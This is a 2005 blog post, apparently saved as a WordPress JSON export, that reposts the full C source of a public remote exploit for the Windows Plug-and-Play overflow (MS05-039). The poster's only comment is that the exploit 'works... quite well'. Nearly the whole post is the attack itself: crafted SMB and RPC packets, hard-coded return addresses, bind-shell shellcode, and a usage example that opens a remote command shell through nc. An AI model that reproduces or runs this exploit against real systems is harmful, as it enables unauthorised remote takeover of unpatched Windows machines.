{"id":7564,"date":"2005-08-12T13:05:00","date_gmt":"2005-08-12T17:05:00","guid":{"rendered":"https:\/\/nuxx.net\/blog\/2005\/08\/12\/ms05-039\/"},"modified":"2026-07-01T11:33:29","modified_gmt":"2026-07-01T15:33:29","slug":"ms05-039","status":"publish","type":"post","link":"https:\/\/nuxx.net\/blog\/2005\/08\/12\/ms05-039\/","title":{"rendered":"MS05-039"},"content":{"rendered":"<p><!--more ...and this is why you should keep your Windows machines up to date...--><br \/>\nIt works&#8230;. Quite well&#8230; To say the least.<\/p>\n<p><font face=\"courier\" size=\"small\"><\/p>\n<pre>\/* HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2\r\n*\r\n* Copyright (c) 2005 houseofdabus.\r\n*\r\n* (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\r\n* Universal Exploit + no crash shellcode\r\n*\r\n* .::[ houseofdabus ]::.\r\n*\r\n* ---------------------------------------------------------------------\r\n* Description:\r\n* A remote code execution and local elevation of privilege\r\n* vulnerability exists in Plug and Play that could allow an\r\n* attacker who successfully exploited this vulnerability to take\r\n* complete control of the affected system.\r\n*\r\n* This is a remote code execution and local privilege elevation\r\n* vulnerability. 
On Windows 2000, an anonymous attacker could\r\n* remotely try to exploit this vulnerability.\r\n*\r\n* On Windows XP Service Pack 1, only an authenticated user could\r\n* remotely try to exploit this vulnerability.\r\n* On Windows XP Service Pack 2 and Windows Server 2003, only an\r\n* administrator can remotely access the affected component.\r\n* Therefore, on Windows XP Service Pack 2 and Windows Server 2003,\r\n* this is strictly a local privilege elevation vulnerability.\r\n* An anonymous user cannot remotely attempt to exploit this\r\n* vulnerability on Windows XP Service Pack 2 and Windows\r\n* Server 2003.\r\n*\r\n* ---------------------------------------------------------------------\r\n* Solution:\r\n* http:\/\/www.microsoft.com\/technet\/security\/Bulletin\/MS05-039.mspx\r\n*\r\n* ---------------------------------------------------------------------\r\n* Systems Affected:\r\n* - Windows Server 2003, SP1\r\n* - Windows XP SP1, SP2\r\n* - Windows 2000 SP4\r\n*\r\n* ---------------------------------------------------------------------\r\n* Tested on:\r\n* - Windows 2000 SP4\r\n*\r\n* ---------------------------------------------------------------------\r\n* Compile:\r\n*\r\n* Win32\/VC++ : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c\r\n* Win32\/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c\r\n* Linux : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c\r\n*\r\n* ---------------------------------------------------------------------\r\n* Example:\r\n*\r\n* C:\\>HOD-ms05039-pnp-expl 192.168.0.1 7777\r\n*\r\n* [*] connecting to 192.168.0.22:445...ok\r\n* [*] null session...ok\r\n* [*] bind pipe...ok\r\n* [*] sending crafted packet...ok\r\n* [*] check your shell on 192.168.0.1:7777\r\n* Ctrl+C\r\n*\r\n* C:\\>nc 192.168.0.1 7777\r\n*\r\n* Microsoft Windows 2000 [Version 5.00.2195]\r\n* (C) Copyright 1985-2000 Microsoft Corp.\r\n*\r\n* C:\\WINNT\\system32>\r\n*\r\n* ---------------------------------------------------------------------\r\n*\r\n* 
This is provided as proof-of-concept code only for educational\r\n* purposes and testing by authorized individuals with permission\r\n* to do so.\r\n*\r\n*\/\r\n\r\n\/* #define _WIN32 *\/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n#ifdef _WIN32\r\n#include <winsock2.h>\r\n#pragma comment(lib, \"ws2_32\")\r\n#else\r\n#include <sys\/types.h>\r\n#include <netinet\/in.h>\r\n#include <sys\/socket.h>\r\n#include <netdb.h>\r\n#endif\r\n\r\n\r\nunsigned char SMB_Negotiate[] =\r\n\"\\x00\\x00\\x00\\x85\\xFF\\x53\\x4D\\x42\\x72\\x00\\x00\\x00\\x00\\x18\\x53\\xC8\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x62\\x00\\x02\\x50\\x43\\x20\\x4E\\x45\\x54\\x57\\x4F\"\r\n\"\\x52\\x4B\\x20\\x50\\x52\\x4F\\x47\\x52\\x41\\x4D\\x20\\x31\\x2E\\x30\\x00\\x02\"\r\n\"\\x4C\\x41\\x4E\\x4D\\x41\\x4E\\x31\\x2E\\x30\\x00\\x02\\x57\\x69\\x6E\\x64\\x6F\"\r\n\"\\x77\\x73\\x20\\x66\\x6F\\x72\\x20\\x57\\x6F\\x72\\x6B\\x67\\x72\\x6F\\x75\\x70\"\r\n\"\\x73\\x20\\x33\\x2E\\x31\\x61\\x00\\x02\\x4C\\x4D\\x31\\x2E\\x32\\x58\\x30\\x30\"\r\n\"\\x32\\x00\\x02\\x4C\\x41\\x4E\\x4D\\x41\\x4E\\x32\\x2E\\x31\\x00\\x02\\x4E\\x54\"\r\n\"\\x20\\x4C\\x4D\\x20\\x30\\x2E\\x31\\x32\\x00\";\r\n\r\n\r\nunsigned char SMB_SessionSetupAndX[] 
=\r\n\"\\x00\\x00\\x00\\xA4\\xFF\\x53\\x4D\\x42\\x73\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\r\n\"\\x00\\x00\\x10\\x00\\x0C\\xFF\\x00\\xA4\\x00\\x04\\x11\\x0A\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x20\\x00\\x00\\x00\\x00\\x00\\xD4\\x00\\x00\\x80\\x69\\x00\\x4E\"\r\n\"\\x54\\x4C\\x4D\\x53\\x53\\x50\\x00\\x01\\x00\\x00\\x00\\x97\\x82\\x08\\xE0\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x57\\x00\\x69\\x00\\x6E\\x00\\x64\\x00\\x6F\\x00\\x77\\x00\\x73\\x00\\x20\\x00\"\r\n\"\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x32\\x00\\x31\\x00\\x39\\x00\"\r\n\"\\x35\\x00\\x00\\x00\\x57\\x00\\x69\\x00\\x6E\\x00\\x64\\x00\\x6F\\x00\\x77\\x00\"\r\n\"\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x35\\x00\"\r\n\"\\x2E\\x00\\x30\\x00\\x00\\x00\\x00\\x00\";\r\n\r\n\r\nunsigned char SMB_SessionSetupAndX2[] =\r\n\"\\x00\\x00\\x00\\xDA\\xFF\\x53\\x4D\\x42\\x73\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\r\n\"\\x00\\x08\\x20\\x00\\x0C\\xFF\\x00\\xDA\\x00\\x04\\x11\\x0A\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x57\\x00\\x00\\x00\\x00\\x00\\xD4\\x00\\x00\\x80\\x9F\\x00\\x4E\"\r\n\"\\x54\\x4C\\x4D\\x53\\x53\\x50\\x00\\x03\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x46\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x47\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x06\\x00\\x06\\x00\\x40\"\r\n\"\\x00\\x00\\x00\\x10\\x00\\x10\\x00\\x47\\x00\\x00\\x00\\x15\\x8A\\x88\\xE0\\x48\"\r\n\"\\x00\\x4F\\x00\\x44\\x00\\x00\\xED\\x41\\x2C\\x27\\x86\\x26\\xD2\\x59\\xA0\\xB3\"\r\n\"\\x5E\\xAA\\x00\\x88\\x6F\\xC5\\x57\\x00\\x69\\x00\\x6E\\x00\\x64\\x00\\x6F\\x00\"\r\n\"\\x77\\x00\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\"\r\n\"\\x32\\x00\\x31\\x00\\x39\\x00\\x35\\x00\\x00
\\x00\\x57\\x00\\x69\\x00\\x6E\\x00\"\r\n\"\\x64\\x00\\x6F\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x30\\x00\"\r\n\"\\x30\\x00\\x20\\x00\\x35\\x00\\x2E\\x00\\x30\\x00\\x00\\x00\\x00\\x00\";\r\n\r\n\r\nunsigned char SMB_TreeConnectAndX[] =\r\n\"\\x00\\x00\\x00\\x5A\\xFF\\x53\\x4D\\x42\\x75\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xFF\\xFE\"\r\n\"\\x00\\x08\\x30\\x00\\x04\\xFF\\x00\\x5A\\x00\\x08\\x00\\x01\\x00\\x2F\\x00\\x00\";\r\n\r\n\r\n\r\nunsigned char SMB_TreeConnectAndX_[] =\r\n\"\\x00\\x00\\x3F\\x3F\\x3F\\x3F\\x3F\\x00\";\r\n\r\n\r\n\/* browser *\/\r\nunsigned char SMB_PipeRequest_browser[] =\r\n\"\\x00\\x00\\x00\\x66\\xFF\\x53\\x4D\\x42\\xA2\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x78\\x04\"\r\n\"\\x00\\x08\\x40\\x00\\x18\\xFF\\x00\\xDE\\xDE\\x00\\x10\\x00\\x16\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x9F\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x00\\x00\\x00\"\r\n\"\\x02\\x00\\x00\\x00\\x03\\x13\\x00\\x00\\x5C\\x00\\x62\\x00\\x72\\x00\\x6F\\x00\"\r\n\"\\x77\\x00\\x73\\x00\\x65\\x00\\x72\\x00\\x00\\x00\";\r\n\r\n\r\nunsigned char SMB_PNPEndpoint[] =\r\n\/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp 
*\/\r\n\"\\x00\\x00\\x00\\x9C\\xFF\\x53\\x4D\\x42\\x25\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x78\\x04\"\r\n\"\\x00\\x08\\x50\\x00\\x10\\x00\\x00\\x48\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x54\\x00\\x48\\x00\\x54\\x00\\x02\"\r\n\"\\x00\\x26\\x00\\x00\\x40\\x59\\x00\\x00\\x5C\\x00\\x50\\x00\\x49\\x00\\x50\\x00\"\r\n\"\\x45\\x00\\x5C\\x00\\x00\\x00\\x40\\x00\\x05\\x00\\x0B\\x03\\x10\\x00\\x00\\x00\"\r\n\"\\x48\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xB8\\x10\\xB8\\x10\\x00\\x00\\x00\\x00\"\r\n\"\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x40\\x4E\\x9F\\x8D\\x3D\\xA0\\xCE\\x11\"\r\n\"\\x8F\\x69\\x08\\x00\\x3E\\x30\\x05\\x1B\\x01\\x00\\x00\\x00\\x04\\x5D\\x88\\x8A\"\r\n\"\\xEB\\x1C\\xC9\\x11\\x9F\\xE8\\x08\\x00\\x2B\\x10\\x48\\x60\\x02\\x00\\x00\\x00\";\r\n\r\n\r\n\r\nunsigned char RPC_call[] =\r\n\"\\x00\\x00\\x08\\x90\\xFF\\x53\\x4D\\x42\\x25\\x00\\x00\\x00\\x00\\x18\\x07\\xC8\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x78\\x04\"\r\n\"\\x00\\x08\\x60\\x00\\x10\\x00\\x00\\x3C\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x54\\x00\\x3C\\x08\\x54\\x00\\x02\"\r\n\"\\x00\\x26\\x00\\x00\\x40\\x4D\\x08\\x00\\x5C\\x00\\x50\\x00\\x49\\x00\\x50\\x00\"\r\n\"\\x45\\x00\\x5C\\x00\\x00\\x00\\x40\\x00\\x05\\x00\\x00\\x03\\x10\\x00\\x00\\x00\"\r\n\"\\x3C\\x08\\x00\\x00\\x01\\x00\\x00\\x00\\x24\\x08\\x00\\x00\\x00\\x00\\x36\\x00\"\r\n\"\\x11\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\x52\\x00\\x4F\\x00\"\r\n\"\\x4F\\x00\\x54\\x00\\x5C\\x00\\x53\\x00\\x59\\x00\\x53\\x00\\x54\\x00\\x45\\x00\"\r\n\"\\x4D\\x00\\x5C\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\xFF\\xFF\\x00\\x00\\xE0\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\"\\xC0\\x07\\x00\\x00\\x00\\x00\\x00\\x00\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\xEB\\x08\\
x90\\x90\\x67\\x15\\x7a\\x76\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\"\r\n\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\"\r\n\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\"\r\n\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\"\r\n\r\n\/* jmp over - entry point *\/\r\n\"\\xEB\\x08\\x90\\x90\"\r\n\r\n\/* pop reg; pop reg; retn; - umpnpmgr.dll *\/\r\n\"\\x67\\x15\\x7a\\x76\" \/* 0x767a1567 *\/\r\n\r\n\/* jmp ebx - umpnpmgr.dll\r\n\"\\x6f\\x36\\x7a\\x76\" *\/\r\n\r\n\"\\xEB\\x08\\x90\\x90\\x67\\x15\\x7a\\x76\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xEB\\x08\\x90\\x90\\x48\\x4F\\x44\\x88\\x90\"\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\";\r\n\r\n\r\nunsigned char RPC_call_end[] =\r\n\"\\xE0\\x07\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\r\n\r\n\r\nunsigned char bind_shellcode[] =\r\n\"\\x29\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x19\"\r\n\"\\xf5\\x04\\x37\\x83\\xeb\\xfc\\xe2\\xf4\\xe5\\x9f\\xef\\x7a\\xf1\\x0c\\xfb\\xc8\"\r\n\"\\xe6\\x95\\x8f\\x5b\\x3d\\xd1\\x8f\\x72\\x25\\x7e\\x78\\x32\\x61\\xf4\\xeb\\xbc\"\r\n\"\\x56\\xed\\x8f\\x68\\x39\\xf4\\xef\\x7e\\x92\\xc1\\x8f\\x36\\xf7\\xc4\\xc4\\xae\"\r\n\"\\xb5\\x71\\xc4\\x43\\x1e\\x34\\xce\\x3a\\x18\\x37\\xef\\xc3\\x22\\xa1\\x20\\x1f\"\r\n\"\\x6c\\x10\\x8f\\x68\\x3d\\xf4\\xef\\x51\\x92\\xf9\\x4f\\xbc\\x46\\xe9\\x05\\xdc\"\r\n\"\\x1a\\xd9\\x8f\\xbe\\x75\\xd1\\x18\\x56\\xda\\xc4\\xdf\\x53\\x92\\xb6\\x34\\xbc\"\r\n\"\\x59\\xf9\\x8f\\x47\\x05\\x58\\x8f\\x77\\x11\\xab\\x6c\\xb9\\x57\\xfb\\xe8\\x67\"\r\n\"\\xe6\\x23\\x62\\x64\\x7f\\x9d\\x37\\x05\\x71\\x82\\x77\\x05\\x46\\xa1\\xfb\\xe7\"\r\n\"\\x71\\x3e\\xe9\\xcb\\x22\\xa5\\xfb\\xe1\\x46\\x7c\\xe1\\x51\\x98\\x18\\x0c\\x35\"\r\n\"\\x4c\\x9f\\x06\\xc8\\xc9\\x9d\\xdd\\x3e\\xec\\x58\\x53\\xc8\\xcf\\xa6\\x57\\x64\"\r\n\"\\x4a\\xa6\\x47\\x64\\x5a\\xa6\\xfb\\xe7\\x7f\\x9d\\x1a\\x55\\x7f\\xa6\\x8d
\\xd6\"\r\n\"\\x8c\\x9d\\xa0\\x2d\\x69\\x32\\x53\\xc8\\xcf\\x9f\\x14\\x66\\x4c\\x0a\\xd4\\x5f\"\r\n\"\\xbd\\x58\\x2a\\xde\\x4e\\x0a\\xd2\\x64\\x4c\\x0a\\xd4\\x5f\\xfc\\xbc\\x82\\x7e\"\r\n\"\\x4e\\x0a\\xd2\\x67\\x4d\\xa1\\x51\\xc8\\xc9\\x66\\x6c\\xd0\\x60\\x33\\x7d\\x60\"\r\n\"\\xe6\\x23\\x51\\xc8\\xc9\\x93\\x6e\\x53\\x7f\\x9d\\x67\\x5a\\x90\\x10\\x6e\\x67\"\r\n\"\\x40\\xdc\\xc8\\xbe\\xfe\\x9f\\x40\\xbe\\xfb\\xc4\\xc4\\xc4\\xb3\\x0b\\x46\\x1a\"\r\n\"\\xe7\\xb7\\x28\\xa4\\x94\\x8f\\x3c\\x9c\\xb2\\x5e\\x6c\\x45\\xe7\\x46\\x12\\xc8\"\r\n\"\\x6c\\xb1\\xfb\\xe1\\x42\\xa2\\x56\\x66\\x48\\xa4\\x6e\\x36\\x48\\xa4\\x51\\x66\"\r\n\"\\xe6\\x25\\x6c\\x9a\\xc0\\xf0\\xca\\x64\\xe6\\x23\\x6e\\xc8\\xe6\\xc2\\xfb\\xe7\"\r\n\"\\x92\\xa2\\xf8\\xb4\\xdd\\x91\\xfb\\xe1\\x4b\\x0a\\xd4\\x5f\\xf6\\x3b\\xe4\\x57\"\r\n\"\\x4a\\x0a\\xd2\\xc8\\xc9\\xf5\\x04\\x37\";\r\n\r\n#define SET_PORTBIND_PORT(buf, port) \\\r\n*(unsigned short *)(((buf)+186)) = (port)\r\n\r\n\r\nvoid\r\nconvert_name(char *out, char *name)\r\n{\r\nunsigned long len;\r\n\r\nlen = strlen(name);\r\nout += len * 2 - 1;\r\nwhile (len--) {\r\n*out-- = '\\x00';\r\n*out-- = name[len];\r\n}\r\n}\r\n\r\n\r\n\r\nint\r\nmain (int argc, char **argv)\r\n{\r\nstruct sockaddr_in addr;\r\nstruct hostent *he;\r\nint len;\r\nint sockfd;\r\nunsigned short smblen;\r\nunsigned short bindport;\r\nunsigned char tmp[1024];\r\nunsigned char packet[4096];\r\nunsigned char *ptr;\r\nchar recvbuf[4096];\r\n\r\n#ifdef _WIN32\r\nWSADATA wsa;\r\nWSAStartup(MAKEWORD(2,0), &wsa);\r\n#endif\r\n\r\nprintf(\"\\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\\n\");\r\nprintf(\"\\t Universal Exploit + no crash shellcode\\n\\n\\n\");\r\nprintf(\"\\t Copyright (c) 2005 .: houseofdabus :.\\n\\n\\n\");\r\n\r\n\r\nif (argc < 3) {\r\nprintf(\"%s <host> <bind port>\\n\", argv[0]);\r\nexit(0);\r\n}\r\n\r\nif ((he = gethostbyname(argv[1])) == NULL) {\r\nprintf(\"[-] Unable to resolve %s\\n\", argv[1]);\r\nexit(0);\r\n}\r\n\r\nif ((sockfd = 
socket(AF_INET, SOCK_STREAM, 0)) < 0) {\r\nprintf(\"[-] socket failed\\n\");\r\nexit(0);\r\n}\r\n\r\naddr.sin_family = AF_INET;\r\naddr.sin_port = htons(445);\r\naddr.sin_addr = *((struct in_addr *)he->h_addr);\r\nmemset(&(addr.sin_zero), '\\0', 8);\r\n\r\n\r\n\r\nprintf(\"\\n[*] connecting to %s:445...\", argv[1]);\r\nif (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {\r\nprintf(\"\\n[-] connect failed\\n\");\r\nexit(0);\r\n}\r\nprintf(\"ok\\n\");\r\n\r\nprintf(\"[*] null session...\");\r\nif (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {\r\nprintf(\"\\n[-] send failed\\n\");\r\nexit(0);\r\n}\r\n\r\nlen = recv(sockfd, recvbuf, 4096, 0);\r\nif ((len <= 10) || (recvbuf[9] != 0)) {\r\nprintf(\"\\n[-] failed\\n\");\r\nexit(0);\r\n}\r\n\r\nif (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {\r\nprintf(\"\\n[-] send failed\\n\");\r\nexit(0);\r\n}\r\n\r\nlen = recv(sockfd, recvbuf, 4096, 0);\r\nif (len <= 10) {\r\nprintf(\"\\n[-] failed\\n\");\r\nexit(0);\r\n}\r\n\r\nif (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {\r\nprintf(\"\\n[-] send failed\\n\");\r\nexit(0);\r\n}\r\n\r\nlen = recv(sockfd, recvbuf, 4096, 0);\r\nif ((len <= 10) || (recvbuf[9] != 0)) {\r\nprintf(\"\\n[-] failed\\n\");\r\nexit(0);\r\n}\r\n\r\nptr = packet;\r\nmemcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);\r\nptr += sizeof(SMB_TreeConnectAndX)-1;\r\n\r\nsprintf(tmp, \"\\\\\\\\%s\\\\IPC$\", argv[1]);\r\nconvert_name(ptr, tmp);\r\nsmblen = strlen(tmp)*2;\r\nptr += smblen;\r\nsmblen += 9;\r\nmemcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &#038;smblen, 1);\r\n\r\nmemcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);\r\nptr += sizeof(SMB_TreeConnectAndX_)-1;\r\n\r\nsmblen = ptr-packet;\r\nsmblen -= 4;\r\nmemcpy(packet+3, &#038;smblen, 1);\r\n\r\nif (send(sockfd, packet, ptr-packet, 0) < 0) {\r\nprintf(\"\\n[-] send failed\\n\");\r\nexit(0);\r\n}\r\n\r\nlen = recv(sockfd, 
recvbuf, 4096, 0);\r\nif ((len <= 10) || (recvbuf[9] != 0)) {\r\nprintf(\"\\n[-] failed\\n\");\r\nexit(0);\r\n}\r\n\r\nprintf(\"ok\\n\");\r\nprintf(\"[*] bind pipe...\");\r\n\r\nif (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {\r\nprintf(\"\\n[-] send failed\\n\");\r\nexit(0);\r\n}\r\n\r\nlen = recv(sockfd, recvbuf, 4096, 0);\r\nif ((len <= 10) || (recvbuf[9] != 0)) {\r\nprintf(\"\\n[-] failed\\n\");\r\nexit(0);\r\n}\r\n\r\nif (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {\r\nprintf(\"\\n[-] send failed\\n\");\r\nexit(0);\r\n}\r\n\r\nlen = recv(sockfd, recvbuf, 4096, 0);\r\nif ((len <= 10) || (recvbuf[9] != 0)) {\r\nprintf(\"\\n[-] failed\\n\");\r\nexit(0);\r\n}\r\n\r\nprintf(\"ok\\n\");\r\nprintf(\"[*] sending crafted packet...\");\r\n\r\n\/\/ nop\r\nptr = packet;\r\nmemset(packet, '\\x90', sizeof(packet));\r\n\r\n\/\/ header &#038; offsets\r\nmemcpy(ptr, RPC_call, sizeof(RPC_call)-1);\r\nptr += sizeof(RPC_call)-1;\r\n\r\n\/\/ shellcode\r\nbindport = (unsigned short)atoi(argv[2]);\r\nbindport ^= 0x0437;\r\nSET_PORTBIND_PORT(bind_shellcode, htons(bindport));\r\nmemcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);\r\n\r\n\/\/ end of packet\r\nmemcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,\r\nRPC_call_end,\r\nsizeof(RPC_call_end)-1);\r\n\r\n\/\/ sending...\r\nif (send(sockfd, packet, 2196, 0) < 0) {\r\nprintf(\"\\n[-] send failed\\n\");\r\nexit(0);\r\n}\r\nprintf(\"ok\\n\");\r\nprintf(\"[*] check your shell on %s:%i\\n\", argv[1], atoi(argv[2]));\r\n\r\nrecv(sockfd, recvbuf, 4096, 0);\r\n\r\nreturn 
0;\r\n}<\/pre>\n<p><\/font><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[13,34],"tags":[],"class_list":["post-7564","post","type-post","status-publish","format-standard","hentry","category-computers","category-moved-from-livejournal"],"_links":{"self":[{"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/posts\/7564","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/comments?post=7564"}],"version-history":[{"count":1,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/posts\/7564\/revisions"}],"predecessor-version":[{"id":14064,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/posts\/7564\/revisions\/14064"}],"wp:attachment":[{"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/media?parent=7564"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/categories?post=7564"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/tags?post=7564"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}